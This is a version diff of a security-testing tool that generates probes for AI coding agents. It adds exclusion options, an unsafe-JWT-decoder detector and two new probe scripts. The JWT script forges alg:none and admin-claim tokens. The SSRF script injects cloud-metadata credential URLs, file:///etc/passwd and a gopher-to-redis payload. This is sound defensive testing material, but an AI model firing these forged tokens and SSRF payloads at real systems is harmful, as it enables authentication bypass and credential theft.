websec-validator 0.2.3__tar.gz → 0.2.4__tar.gz

{websec_validator-0.2.3/src/websec_validator.egg-info → websec_validator-0.2.4}/PKG-INFO

@@ -1,6 +1,6 @@
 Metadata-Version: 2.4
 Name: websec-validator
-Version: 0.2.3
+Version: 0.2.4
 Summary: Local-first security recon that briefs your AI coding agent: facts + tailored probe scripts, code-in / artifacts-out. No LLM, no server, no running app.
 Author: Ricardo Accioly
 License: MIT

{websec_validator-0.2.3 → websec_validator-0.2.4}/pyproject.toml

@@ -4,7 +4,7 @@ build-backend = "setuptools.build_meta"
 
 [project]
 name = "websec-validator"
-version = "0.2.3"
+version = "0.2.4"
 description = "Local-first security recon that briefs your AI coding agent: facts + tailored probe scripts, code-in / artifacts-out. No LLM, no server, no running app."
 readme = "README.md"
 requires-python = ">=3.11"

{websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/briefing.py

@@ -118,6 +118,7 @@ credentials** — ask the human, never fabricate, never hit production.
 - **Datastores:** {", ".join(stack.get("datastores", [])) or "?"}  ·  **Monorepo:** {stack.get("monorepo", False)}
 - **Auth scheme:** `{auth.get("scheme","?")}` (token in {auth.get("token_location","?")})  ·  guard files: {len(auth.get("guard_files", []))}
 - **Route engine:** {routes.get("engine","?")}  ·  **{routes.get('count',0)} endpoints**  ·  by method: {routes.get("by_method", {})}
+{("> " + routes["note"]) if routes.get("note") else ""}
 
 ## 2. ★ Tenant boundary (confirm first — highest value, easiest to get wrong)
 

{websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/cli.py

@@ -87,7 +87,7 @@ def cmd_run(args) -> int:
     print(f"websec-validator v{__version__}  ·  target: {target}  ·  run {ts}\n")
 
     # 1. recon
-    facts = recon.build_facts(target, __version__)
+    facts = recon.build_facts(target, __version__, args.exclude)
     recon.write_facts(facts, out / "FACTS.json")
     langs = facts["stack"]["languages"]
     _print_facts_summary(facts)
@@ -98,7 +98,8 @@ def cmd_run(args) -> int:
     unified = None
     if args.scan:
         print("\n  running available static scanners (read-only)…")
-        scan_results = scanners.run_available(target, out, langs)
+        only = args.scanners.split(",") if args.scanners else None
+        scan_results = scanners.run_available(target, out, langs, excludes=args.exclude, only=only)
         for r in scan_results:
             tag = r.get("findings", r.get("status", "?"))
             print(f"    {r['name']}: {tag}")
@@ -342,6 +343,10 @@ def build_parser() -> argparse.ArgumentParser:
     r.add_argument("target")
     r.add_argument("--scan", action="store_true", help="also execute available static scanners")
     r.add_argument("--out", help="output dir (default: ./websec-out)")
+    r.add_argument("--exclude", action="append", metavar="PATH",
+                   help="exclude a path/glob from recon + scanners (repeatable; e.g. --exclude 'docs/**')")
+    r.add_argument("--scanners", metavar="A,B",
+                   help="comma-separated subset of scanners to run with --scan (e.g. gitleaks,semgrep)")
     r.set_defaults(func=cmd_run)
 
     # recon/proof/calibrate are hidden from the main --help (argparse.SUPPRESS): recon is a

{websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/extractors/__init__.py

@@ -39,9 +39,9 @@ REGISTRY: list[Extractor] = [
 ]
 
 
-def run_all(root: Path, version: str) -> dict:
+def run_all(root: Path, version: str, excludes: list | None = None) -> dict:
     """Walk the repo once, run every extractor, return the merged FACTS dict."""
-    ctx = RepoContext(root)
+    ctx = RepoContext(root, excludes)
     facts: dict = {
         "tool": "websec-validator",
         "version": version,

{websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/extractors/authz.py

@@ -52,6 +52,14 @@ ROLE = re.compile(
     r"has_?[Rr]ole\s*\(\s*['\"]([\w:.-]+)['\"]|"
     r"authorizeRoles\s*\(([^)]*)\)|permission_required\s*\(\s*['\"]([\w:.-]+)['\"]")
 
+# F5: a call to a decoder/parser named "unsafe"/"unverified"/"noVerify"/"skipVerify"
+# (e.g. decodeJwtPayloadUnsafe) — dangerous when its result feeds an auth decision.
+UNSAFE_DECODER = re.compile(r"\b([A-Za-z_]\w*(?:[Uu]nsafe|[Uu]nverified|[Nn]o[Vv]erif\w*|[Ss]kip[Vv]erif\w*)\w*)\s*\(")
+# does this file actually make an auth/identity decision? (so the unsafe decode matters)
+AUTH_CONTEXT = re.compile(
+    r"require(?:Auth|Admin|Role|Permission)|isAdmin|authoriz|getToken\s*\(|getServerSession|"
+    r"req\.auth\b|currentUser|jwt\.(?:decode|verify)|decodeJwt", re.I)
+
 
 def _parse_next_middleware(ctx: RepoContext) -> dict:
     # Next 15.5+/16 renamed `middleware.ts` → `proxy.ts` (both filenames are valid; the
@@ -127,6 +135,13 @@ class AuthzExtractor(Extractor):
                 if e.get("method") in WRITE_VERBS and not PUBLIC_HINT.search(e.get("path", "")):
                     no_guard_writes.append(f"{e['method']} {e['path']}  ({relcp or '?'})")
 
+        # F5: files that make an auth decision AND call an unsafe/unverified decoder
+        unsafe_decoders = []
+        for _p, rel, text in ctx.iter_code():
+            if AUTH_CONTEXT.search(text):
+                for dec in sorted(set(UNSAFE_DECODER.findall(text))):
+                    unsafe_decoders.append({"file": rel, "decoder": dec})
+
         if global_auth:
             where = f"`{mw['file']}` (matcher {mw.get('matchers') or '—'})" if mw_auth else "`app.use(<auth>)`"
             note = (f"A GLOBAL auth middleware ({where}) was detected — most routes are protected by default. "
@@ -146,5 +161,6 @@ class AuthzExtractor(Extractor):
                               "no_visible_guard": no_guard, "unknown": unknown},
             "endpoint_guards": egs[:400],
             "write_endpoints_without_visible_guard": sorted(set(no_guard_writes))[:60],
+            "unsafe_auth_decoders": unsafe_decoders[:30],
             "note": note,
         }

{websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/extractors/base.py

@@ -9,6 +9,7 @@ still say something useful.
 
 from __future__ import annotations
 
+import fnmatch
 from pathlib import Path
 
 SKIP_DIRS = {".git", "node_modules", "dist", "build", ".next", ".nuxt", "venv",
@@ -27,13 +28,17 @@ MAX_BYTES = 2_000_000
 class RepoContext:
     """Walk the tree once; cache file text; serve cheap queries to every extractor."""
 
-    def __init__(self, root: Path):
+    def __init__(self, root: Path, excludes: list | None = None):
         self.root = root
+        self.excludes = [e for e in (excludes or []) if e]   # user --exclude paths/globs
         self._text: dict[Path, str] = {}
         self.code_files: list[Path] = []
         self.stack: dict = {}          # filled by StackExtractor, read by the rest
         self._walk()
 
+    def _excluded(self, rel: str) -> bool:
+        return any(ex in rel or fnmatch.fnmatch(rel, ex) for ex in self.excludes)
+
     def _walk(self) -> None:
         n = 0
         for p in self.root.rglob("*"):
@@ -44,6 +49,8 @@ class RepoContext:
             # have its whole tree skipped.
             if p.is_dir() or any(part in SKIP_DIRS for part in p.relative_to(self.root).parts):
                 continue
+            if self.excludes and self._excluded(str(p.relative_to(self.root))):
+                continue
             if p.suffix.lower() in CODE_EXT:
                 self.code_files.append(p)
                 n += 1

{websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/extractors/routes.py

@@ -38,6 +38,20 @@ TRAVERSAL_NAMES = re.compile(r"^(file|filename|filepath|path|dir|folder|template
 TEMPLATED = ("BASE_URL", "localhost", "127.0.0.1", "${", "{{")
 ASSET_GLOB = re.compile(r"\*\.\w+")
 
+# A route whose source file is a vendored/third-party API SPEC (OpenAPI/Swagger/GraphQL
+# schema), not an app handler. Noir parses these and emits their paths as if the app
+# served them — which on a repo that vendors e.g. a 16k-line swagger turns ~15 real
+# findings into hundreds of phantom ones. We split these out as informational.
+SPEC_PATH = re.compile(
+    r"\.(?:ya?ml|graphql|gql|raml)$"                                  # spec file formats
+    r"|(?:^|/)(?:node_modules|vendor|vendored|third[_-]?party|examples?|schemas?"
+    r"|(?:docs?|documentation)[\w-]*)/"                               # vendor/docs/schema dirs
+    r"|swagger|openapi", re.I)
+
+
+def _is_spec_derived(code_path: str) -> bool:
+    return bool(code_path) and bool(SPEC_PATH.search(code_path))
+
 
 def _clean_path(p: str) -> str:
     p = re.sub(r":(\w+)", r"{\1}", p)    # Express :id  -> {id}
@@ -53,16 +67,17 @@ def _is_noise(path: str) -> bool:
     return bool(ASSET_GLOB.search(path))   # static-asset glob route (/*.png)
 
 
-def _noir_scan(root: Path) -> list | None:
+def _noir_scan(root: Path, extra_excludes: list | None = None) -> list | None:
     """Run Noir → list of endpoint dicts, or None if Noir unavailable/failed."""
     if not shutil.which("noir"):
         return None
+    excl = EXCLUDE_GLOBS + ("," + ",".join(extra_excludes) if extra_excludes else "")
     with tempfile.NamedTemporaryFile(suffix=".json", delete=False) as tf:
         out = Path(tf.name)
     try:
         proc = subprocess.run(
             ["noir", "scan", str(root), "-f", "json", "-o", str(out),
-             "--exclude-path", EXCLUDE_GLOBS, "--no-log", "--no-color"],
+             "--exclude-path", excl, "--no-log", "--no-color"],
             capture_output=True, text=True, timeout=300)
         if not out.exists():
             return None
@@ -77,8 +92,10 @@ def _noir_scan(root: Path) -> list | None:
             pass
 
 
-def _normalize_noir(eps: list) -> list:
-    rows, seen = [], set()
+def _normalize_noir(eps: list) -> tuple:
+    """→ (app_routes, spec_derived_routes). Routes whose source file is a vendored API
+    spec are split out so they don't generate phantom findings (B1)."""
+    rows, spec, seen = [], [], set()
     for e in eps:
         if e.get("internal"):
             continue
@@ -89,21 +106,22 @@ def _normalize_noir(eps: list) -> list:
         if _is_noise(path):
             continue
         method = (e.get("method") or "GET").upper()
-        if (method, path) in seen:
-            continue
-        seen.add((method, path))
-        params = [{"name": p.get("name", ""), "where": p.get("param_type", "")}
-                  for p in (e.get("params") or [])]
         cp = (e.get("details", {}) or {}).get("code_paths") or [{}]
-        rows.append({
+        code_path = cp[0].get("path", "")
+        if (method, path, code_path) in seen:
+            continue
+        seen.add((method, path, code_path))
+        row = {
             "method": method,
             "path": path,
-            "params": params,
+            "params": [{"name": p.get("name", ""), "where": p.get("param_type", "")}
+                       for p in (e.get("params") or [])],
             "technology": (e.get("details", {}) or {}).get("technology", ""),
-            "code_path": cp[0].get("path", ""),
+            "code_path": code_path,
             "source": "noir",
-        })
-    return rows
+        }
+        (spec if _is_spec_derived(code_path) else rows).append(row)
+    return rows, spec
 
 
 # ---- regex fallback (only when Noir is absent) ---------------------------------------------
@@ -193,19 +211,23 @@ class RoutesExtractor(Extractor):
     category = "surface"
 
     def extract(self, ctx: RepoContext, facts: dict) -> dict:
-        eps = _noir_scan(ctx.root)
+        eps = _noir_scan(ctx.root, getattr(ctx, "excludes", None))
         if eps is not None:
-            routes = _normalize_noir(eps)
+            routes, spec_derived = _normalize_noir(eps)
             engine = "noir"
         else:
-            routes = _fallback(ctx)
+            routes, spec_derived = _fallback(ctx), []
             engine = "regex-fallback (install OWASP Noir for full coverage: brew install noir)"
+        # honor user --exclude against route code_paths too (Noir's own --exclude-path glob is
+        # unreliable for bare dir names; this guarantees `--exclude <path>` drops those routes).
+        if getattr(ctx, "excludes", None):
+            routes = [r for r in routes if not ctx._excluded(r.get("code_path", ""))]
         by_method: dict = {}
         by_tech: dict = {}
         for r in routes:
             by_method[r["method"]] = by_method.get(r["method"], 0) + 1
             by_tech[r["technology"]] = by_tech.get(r["technology"], 0) + 1
-        return {
+        out = {
             "engine": engine,
             "count": len(routes),
             "by_method": by_method,
@@ -213,3 +235,12 @@ class RoutesExtractor(Extractor):
             "endpoints": routes,
             "targeting": _derive(routes),
         }
+        if spec_derived:
+            from collections import Counter
+            srcs = Counter(r["code_path"] for r in spec_derived)
+            out["spec_derived_excluded"] = len(spec_derived)
+            out["spec_derived_sources"] = [f"{n}× {f}" for f, n in srcs.most_common(8)]
+            out["note"] = (f"⚠ {len(spec_derived)} routes came from vendored API SPEC files "
+                           f"(OpenAPI/Swagger/GraphQL), not app handlers — EXCLUDED from the {len(routes)} "
+                           f"app routes + all findings. Sources: {', '.join(f for f, _ in srcs.most_common(5))}.")
+        return out

{websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/findings.py

@@ -26,6 +26,9 @@ from . import calibration
 STANDARDS = {
     "missing-auth": (["CWE-862 Missing Authorization", "CWE-306 Missing Authentication"],
                      "ASVS V4.1.1", ["API1:2023 BOLA", "API5:2023 BFLA"]),
+    "unsafe-auth-decoder": (["CWE-347 Improper Verification of Cryptographic Signature",
+                             "CWE-345 Insufficient Verification of Data Authenticity"],
+                            "ASVS V3.5.2", ["API2:2023 Broken Authentication"]),
     "bola": (["CWE-639 Authorization Bypass (IDOR)"], "ASVS V4.2.1", ["API1:2023 BOLA"]),
     "ssrf": (["CWE-918 SSRF"], "ASVS V12.6", ["API7:2023 SSRF"]),
     "secret": (["CWE-798 Hard-coded Credentials"], "ASVS V2.10", ["API8:2023 Misconfiguration"]),
@@ -48,6 +51,9 @@ REMEDIATION = {
     "missing-auth": "Add an auth guard to the handler (e.g. requireAuth()/getServerSession()), or a "
                     "middleware matcher over /api/(.*) with an explicit public allowlist so it can't be forgotten.",
     "bola": "Enforce object ownership: verify the authenticated principal owns/can access the resource id (tenant scope).",
+    "unsafe-auth-decoder": "Verify the token/signature before trusting it for an auth/identity decision — use a "
+                           "verifying decode (e.g. jwt.verify with the key / a checked session), never an *Unsafe* "
+                           "or decode-only path whose output then feeds requireAuth/requireAdmin.",
     "ssrf": "Validate + allowlist outbound URLs; block RFC1918/IMDS/file://; never fetch a raw user-supplied URL.",
     "secret": "Rotate the credential, remove from code/history, load from a secrets manager.",
     "cve": "Upgrade the dependency to the fixed version.",
@@ -150,6 +156,14 @@ def build_ledger(facts: dict, unified: dict | None, dynamic: dict | None = None,
                       [{"layer": "dynamic", "detail": f"cross-tenant GET returned another tenant's data "
                         f"(HTTP {lk.get('status')}, {lk.get('direction')})"}]))
 
+    # ---- 1c. Unsafe/unverified decoder feeding an auth decision (F5) ----
+    for ud in ((facts.get("authz", {}) or {}).get("unsafe_auth_decoders", []) or []):
+        out.append(_f(f"Auth decision uses an unverified decoder: {ud.get('decoder')}", "access-control",
+                      "unsafe-auth-decoder", "HIGH", "MEDIUM", ud.get("file", ""),
+                      [{"layer": "recon", "detail": f"{ud.get('file')} makes an auth/identity decision AND calls "
+                        f"{ud.get('decoder')}() — if that decodes a token/signature WITHOUT verifying it, a forged "
+                        "value is trusted (the decodeJwtPayloadUnsafe → requireAdmin class of bug). Trace the call path."}]))
+
     # ---- 2. Static scanner findings (de-duplicated `unified`) ----
     cat_to_class = {"sca": "cve", "secret": "secret", "iac": "iac", "sast": "sast"}
     for t in (unified or {}).get("top", []):

{websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/recon.py

@@ -14,8 +14,8 @@ from .extractors.base import RepoContext
 from .extractors.stack import StackExtractor
 
 
-def build_facts(root: Path, version: str) -> dict:
-    return extractors.run_all(root, version)
+def build_facts(root: Path, version: str, excludes: list | None = None) -> dict:
+    return extractors.run_all(root, version, excludes)
 
 
 def write_facts(facts: dict, out: Path) -> Path:

{websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/report.py

@@ -43,8 +43,12 @@ def render(facts: dict, scanners: dict, scan_results: list, unified: dict | None
             chain = " → ".join(e["layer"] for e in f["evidence"])
             api = (" · " + ", ".join(f["standards"]["owasp_api"])) if f["standards"]["owasp_api"] else ""
             cal = f.get("calibrated") or {}
-            calstr = (f" · P(real)≈**{cal.get('p')}** CI {cal.get('ci')} (n={cal.get('n')}, {cal.get('basis')})"
-                      if cal else "")
+            if not cal:
+                calstr = ""
+            elif cal.get("n", 0) == 0 or str(cal.get("basis", "")).startswith("prior"):
+                calstr = " · P(real): _uncalibrated — verify manually_"   # don't dress n=0 as a measurement (B4)
+            else:
+                calstr = f" · P(real)≈**{cal.get('p')}** CI {cal.get('ci')} (n={cal.get('n')}, {cal.get('basis')})"
             _ll.append(f"- **[{f['severity']}/{f['confidence']}]** {f['title']}  \n"
                        f"  `{f['location']}` · evidence: {chain} · {cwe}{api}{calstr}  \n"
                        f"  _fix:_ {f['remediation']}")
@@ -68,7 +72,7 @@ def render(facts: dict, scanners: dict, scan_results: list, unified: dict | None
 | | |
 |---|---|
 | Stack | {", ".join(stack.get("languages", [])) or "?"} · {", ".join(stack.get("frameworks", [])) or "?"} · {", ".join(stack.get("datastores", [])) or "?"} |
-| Endpoints | **{routes.get('count', 0)}** (via {routes.get('engine','?').split(' ')[0]}) |
+| Endpoints | **{routes.get('count', 0)}** app routes (via {routes.get('engine','?').split(' ')[0]}){(" · " + str(routes.get('spec_derived_excluded')) + " spec-derived excluded") if routes.get('spec_derived_excluded') else ""} |
 | Auth | {facts.get('auth', {}).get('scheme','?')} · roles: {', '.join(authz.get('roles_detected', [])) or 'none'} |
 | Access control | {gs.get('with_visible_guard', 0)} guarded · **{gs.get('no_visible_guard', 0)} no visible guard** · global-middleware: {authz.get('global_auth_middleware', False)} |
 | Static scanner (raw, pre-triage) | {sev_line} |

{websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/scanners.py

@@ -40,27 +40,27 @@ EXCLUDE_DIRS = ("websec-out", "node_modules", ".next", "dist", "build", ".git",
                 "security", ".venv", "venv", "__pycache__", ".mypy_cache", "coverage")
 
 
-def _trivy(target: Path, out: Path) -> list:
+def _trivy(target: Path, out: Path, excludes=()) -> list:
     # SCA + secrets + IaC misconfig in one pass; pinned by the user's install.
     cmd = ["trivy", "fs", "--scanners", "vuln,secret,misconfig", "--format", "json", "--output", str(out)]
-    for d in EXCLUDE_DIRS:
+    for d in list(EXCLUDE_DIRS) + list(excludes):
         cmd += ["--skip-dirs", d]
     return cmd + [str(target)]
 
 
-def _gitleaks(target: Path, out: Path) -> list:
+def _gitleaks(target: Path, out: Path, excludes=()) -> list:
     return ["gitleaks", "detect", "--source", str(target), "--no-banner",
             "--report-format", "json", "--report-path", str(out)]
 
 
-def _semgrep(target: Path, out: Path) -> list:
+def _semgrep(target: Path, out: Path, excludes=()) -> list:
     cmd = ["semgrep", "scan", "--config", "auto", "--json", "--output", str(out)]
-    for d in EXCLUDE_DIRS:
+    for d in list(EXCLUDE_DIRS) + list(excludes):
         cmd += ["--exclude", d]
     return cmd + [str(target)]
 
 
-def _checkov(target: Path, out: Path) -> list:
+def _checkov(target: Path, out: Path, excludes=()) -> list:
     return ["checkov", "-d", str(target), "--compact", "-o", "json",
             "--output-file-path", str(out.parent)]
 
@@ -103,26 +103,31 @@ def detect(stack_languages: list | None = None) -> dict:
 
 
 def run_available(target: Path, outdir: Path, stack_languages: list | None = None,
-                  timeout: int = 600) -> list:
+                  timeout: int = 600, excludes: list | None = None, only: list | None = None) -> list:
     """Execute every available, runnable static scanner. Returns per-scanner status.
 
+    `excludes`: extra paths/dirs to skip (--exclude). `only`: run just these scanner keys.
     Raw JSON lands in outdir/scanners/<key>.json. We capture status only here;
     cross-tool normalization + de-duplication is a separate (next) step.
     """
     langs = set(stack_languages or [])
+    excludes = excludes or []
+    only = set(only) if only else None
     scan_dir = outdir / "scanners"
     scan_dir.mkdir(parents=True, exist_ok=True)
     results = []
     for s in REGISTRY:
         if s.argv is None:
             continue  # detect-only for now
+        if only is not None and s.key not in only:
+            continue
         if s.languages and not (set(s.languages) & langs):
             continue
         if not shutil.which(s.binary):
             continue
         out_file = scan_dir / f"{s.key}.json"
         try:
-            proc = subprocess.run(s.argv(target, out_file), capture_output=True,
+            proc = subprocess.run(s.argv(target, out_file, excludes), capture_output=True,
                                   text=True, timeout=timeout)
             results.append({"key": s.key, "name": s.name, "category": s.category,
                             "exit_code": proc.returncode, "output": str(out_file),

{websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/templates/probes/bola-cross-tenant.sh

@@ -18,7 +18,8 @@ if [ -z "${BASE:-}" ] || [ "${BASE#FILL}" != "$BASE" ]; then echo "Set TARGET=ht
 : "${GROUP_A:?set GROUP_A=<tenant/group id of account A>}"
 : "${GROUP_B:?set GROUP_B=<tenant/group id of account B>}"
 
-mapfile -t PATHS < <(python3 -c "
+PATHS=()   # (portable; macOS bash 3.2 lacks `mapfile`)
+while IFS= read -r line; do [ -n "$line" ] && PATHS+=("$line"); done < <(python3 -c "
 import json
 c = json.load(open('$ctx'))['endpoints']
 cand = c.get('idor_candidates') or [w.split(' ',1)[1] for w in c.get('writes',[]) if ' ' in w]

websec_validator-0.2.4/src/websec_validator/templates/probes/jwt-attacks.sh

@@ -0,0 +1,61 @@
+#!/usr/bin/env bash
+# jwt-attacks.sh — manual JWT attack probe (FACTS-driven; no app-specific login).
+#
+# Five classic JWT attacks, run against a protected endpoint with a token YOU supply:
+#   1. alg:none — if accepted, total auth bypass.   2. tampered claims + wrong HS256 sig.
+#   3. expired exp.   4. stripped signature.   5. garbage token.   (each should 401/403)
+# Optional 6. refresh-replay-after-logout if you set REFRESH_TOKEN + the routes exist.
+#
+# Env (see _lib.py): TARGET, TOKEN_A=<a real JWT from a logged-in TEST account>.
+# Optional: TEST_PATH=/api/some/protected/route (else picked from probe-context.json),
+#           REFRESH_TOKEN, LOGOUT_PATH, REFRESH_PATH. Run only against a TEST instance.
+set -uo pipefail
+cd "$(dirname "$0")"
+ctx=probe-context.json
+
+TARGET="${TARGET:-$(python3 -c "import json;print(json.load(open('$ctx'))['target_base_url'])" 2>/dev/null)}"
+if [ -z "${TARGET:-}" ] || [ "${TARGET#FILL}" != "$TARGET" ]; then echo "Set TARGET=http://host:port (or fill probe-context.json)"; exit 2; fi
+: "${TOKEN_A:?set TOKEN_A=<a real JWT from a logged-in test account>}"
+ACCESS_TOKEN="$TOKEN_A"
+# a protected endpoint to fire forged tokens at (override with TEST_PATH)
+TEST_PATH="${TEST_PATH:-$(python3 -c "import json;c=json.load(open('$ctx'))['endpoints'];print((c.get('idor_candidates') or c.get('writes') or ['/']).__getitem__(0).split(' ',1)[-1])" 2>/dev/null)}"
+TEST_URL="$TARGET${TEST_PATH:-/}"
+
+b64url() { python3 -c "import sys,base64; sys.stdout.write(base64.urlsafe_b64encode(sys.stdin.buffer.read()).decode().rstrip('='))"; }
+IFS='.' read -r H P S <<< "$ACCESS_TOKEN"
+PASS_COUNT=0; FAIL_COUNT=0; FAIL_LINES=()
+check() {
+  if [ "$3" = "$2" ]; then printf '  PASS  %-28s expected:%s actual:%s\n' "$1" "$2" "$3"; PASS_COUNT=$((PASS_COUNT+1));
+  else printf '  FAIL  %-28s expected:%s actual:%s\n' "$1" "$2" "$3"; FAIL_COUNT=$((FAIL_COUNT+1)); FAIL_LINES+=("$1 expected $2 got $3"); fi
+}
+echo "=== JWT attacks vs $TEST_URL ==="
+code=$(curl -s -o /dev/null -w '%{http_code}' "$TEST_URL" -H "Authorization: Bearer $ACCESS_TOKEN"); check "sanity (legit token)" "200" "$code"
+DECODED_P=$(echo "$P" | python3 -c "import sys,base64; d=sys.stdin.read(); print(base64.urlsafe_b64decode(d+'=='*(4-len(d)%4)).decode())" 2>/dev/null || echo '{}')
+
+NEW_H=$(printf '{"alg":"none","typ":"JWT"}' | b64url); code=$(curl -s -o /dev/null -w '%{http_code}' "$TEST_URL" -H "Authorization: Bearer ${NEW_H}.${P}."); check "alg:none bypass" "401" "$code"
+HS=$(printf '{"alg":"HS256","typ":"JWT"}' | b64url)
+TP=$(printf '%s' "$DECODED_P" | python3 -c "import sys,json,time
+try: d=json.loads(sys.stdin.read() or '{}')
+except Exception: d={}
+d['admin']=True; d['exp']=int(time.time())+3600
+print(json.dumps(d))" 2>/dev/null || echo '{}')
+TPB=$(printf '%s' "$TP" | b64url)
+WSIG=$(printf '%s.%s' "$HS" "$TPB" | python3 -c "import sys,hmac,hashlib,base64; print(base64.urlsafe_b64encode(hmac.new(b'wrong-secret',sys.stdin.buffer.read(),hashlib.sha256).digest()).decode().rstrip('='))")
+code=$(curl -s -o /dev/null -w '%{http_code}' "$TEST_URL" -H "Authorization: Bearer ${HS}.${TPB}.${WSIG}"); check "tampered claims + wrong sig" "401" "$code"
+EP=$(echo "$DECODED_P" | python3 -c "import sys,json,time;
+try: d=json.loads(sys.stdin.read())
+except: d={}
+d['exp']=int(time.time())-60; print(json.dumps(d))" 2>/dev/null || echo '{}')
+EPB=$(printf '%s' "$EP" | b64url); code=$(curl -s -o /dev/null -w '%{http_code}' "$TEST_URL" -H "Authorization: Bearer ${H}.${EPB}.${S}"); check "expired exp" "401" "$code"
+code=$(curl -s -o /dev/null -w '%{http_code}' "$TEST_URL" -H "Authorization: Bearer ${H}.${P}."); check "stripped signature" "401" "$code"
+code=$(curl -s -o /dev/null -w '%{http_code}' "$TEST_URL" -H "Authorization: Bearer not-a-jwt"); check "garbage token" "401" "$code"
+
+if [ -n "${REFRESH_TOKEN:-}" ]; then
+  curl -s -o /dev/null -X POST "$TARGET${LOGOUT_PATH:-/api/auth/logout}" -H "Authorization: Bearer $ACCESS_TOKEN" -H 'content-type: application/json' -d "{\"refreshToken\":\"$REFRESH_TOKEN\"}" || true
+  code=$(curl -s -o /dev/null -w '%{http_code}' -X POST "$TARGET${REFRESH_PATH:-/api/auth/refresh}" -H 'content-type: application/json' -d "{\"refreshToken\":\"$REFRESH_TOKEN\"}")
+  [ "$code" = "401" ] && echo "  PASS  refresh-after-logout         (invalidated)" || echo "  WARN  refresh-after-logout actual:$code (stateless replay? document the tradeoff)"
+fi
+
+echo "=== Summary: PASS=$PASS_COUNT FAIL=$FAIL_COUNT ==="
+[ "$FAIL_COUNT" -gt 0 ] && { printf '  - %s\n' "${FAIL_LINES[@]}"; exit 1; }
+echo "All JWT attacks blocked — auth layer holds."

websec_validator-0.2.4/src/websec_validator/templates/probes/ssrf-probes.sh

@@ -0,0 +1,62 @@
+#!/usr/bin/env bash
+# ssrf-probes.sh — SSRF probe, FACTS-driven. For each url-accepting endpoint the recon
+# flagged (probe-context.json → ssrf_candidates), inject classic SSRF targets into that
+# param and watch for IMDS/file/redis evidence or a tell-tale slow fetch. Expect
+# 400/403/422 (host validation) or a clean 200 with no credential/IMDS content.
+#
+# Env (see _lib.py): TARGET, and usually TOKEN_A=<jwt> (or COOKIE_A) since these are
+# typically admin/integration endpoints. Run only against a TEST instance.
+set -uo pipefail
+cd "$(dirname "$0")"
+ctx=probe-context.json
+
+TARGET="${TARGET:-$(python3 -c "import json;print(json.load(open('$ctx'))['target_base_url'])" 2>/dev/null)}"
+if [ -z "${TARGET:-}" ] || [ "${TARGET#FILL}" != "$TARGET" ]; then echo "Set TARGET=http://host:port (or fill probe-context.json)"; exit 2; fi
+AUTH=()
+[ -n "${TOKEN_A:-}" ] && AUTH=(-H "Authorization: Bearer $TOKEN_A")
+[ -z "${TOKEN_A:-}" ] && [ -n "${COOKIE_A:-}" ] && AUTH=(-H "Cookie: $COOKIE_A")
+[ ${#AUTH[@]} -eq 0 ] && echo "  (no TOKEN_A/COOKIE_A — probing unauthenticated; most SSRF sinks need auth)"
+
+# url-accepting endpoints recon flagged → "METHOD /path PARAM" lines
+CANDS=()   # (portable; macOS ships bash 3.2 which lacks `mapfile`)
+while IFS= read -r line; do [ -n "$line" ] && CANDS+=("$line"); done < <(python3 -c "
+import json, re
+for c in json.load(open('$ctx'))['endpoints'].get('ssrf_candidates', []):
+    m = re.match(r'(\w+)\s+(\S+).*param:\s*([\w.-]+)', c)
+    if m: print(m.group(1), m.group(2), m.group(3))
+" 2>/dev/null)
+if [ "${#CANDS[@]}" -eq 0 ]; then
+  echo "No SSRF candidates in probe-context.json (recon found no url/domain-ish params). N/A for this app."; exit 0
+fi
+
+SSRF_TARGETS=(
+  "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
+  "http://169.254.170.2/v2/credentials/"
+  "http://127.0.0.1/"
+  "http://10.0.0.1/"
+  "file:///etc/passwd"
+  "gopher://127.0.0.1:6379/_INFO"
+)
+fails=0; warns=0
+for cand in "${CANDS[@]}"; do
+  read -r method path param <<< "$cand"
+  for url in "${SSRF_TARGETS[@]}"; do
+    body=$(python3 -c "import json,sys; print(json.dumps({sys.argv[1]: sys.argv[2]}))" "$param" "$url")
+    start=$(date +%s)
+    resp=$(curl -s -m 8 -w '\nHTTP_CODE:%{http_code}' -X "$method" "$TARGET$path" ${AUTH[@]+"${AUTH[@]}"} -H 'content-type: application/json' -d "$body" 2>&1 || true)
+    dur=$(( $(date +%s) - start ))
+    code=$(printf '%s' "$resp" | grep -oE 'HTTP_CODE:[0-9]+' | cut -d: -f2)
+    bod=$(printf '%s' "$resp" | grep -v 'HTTP_CODE:' | head -c 200)
+    if printf '%s' "$bod" | grep -qE 'AccessKeyId|SecretAccessKey|InstanceId|root:x:0:0|redis_version'; then
+      printf '  FAIL  %s %s [%s] %s  → IMDS/file/redis CONTENT LEAKED\n' "$method" "$path" "${code:-?}" "$param=$url"; fails=$((fails+1))
+    elif [[ "$url" == *169.254.* && "$dur" -gt 5 ]]; then
+      printf '  WARN  %s %s [%s,%ss] %s  → slow; backend may have fetched it\n' "$method" "$path" "${code:-?}" "$dur" "$url"; warns=$((warns+1))
+    elif [[ "$code" =~ ^(400|403|422)$ ]]; then
+      printf '  ok    %s %s [%s] %s  validation rejected\n' "$method" "$path" "$code" "$url"
+    else
+      printf '  ?     %s %s [%s] %s\n' "$method" "$path" "${code:-?}" "$url"
+    fi
+  done
+done
+echo "summary: $fails definitive SSRF · $warns suspicious (review)"
+exit "$fails"

{websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/templates/probes/unauth-baseline.sh

@@ -15,7 +15,8 @@ if [ -z "${BASE:-}" ] || [ "${BASE#FILL}" != "$BASE" ]; then
   echo "Set TARGET=http://host:port (or fill target_base_url in probe-context.json)"; exit 2
 fi
 
-mapfile -t EPS < <(python3 -c "import json;[print(e) for e in json.load(open('$ctx'))['endpoints']['writes']]" 2>/dev/null)
+EPS=()   # (portable; macOS bash 3.2 lacks `mapfile`)
+while IFS= read -r line; do [ -n "$line" ] && EPS+=("$line"); done < <(python3 -c "import json;[print(e) for e in json.load(open('$ctx'))['endpoints']['writes']]" 2>/dev/null)
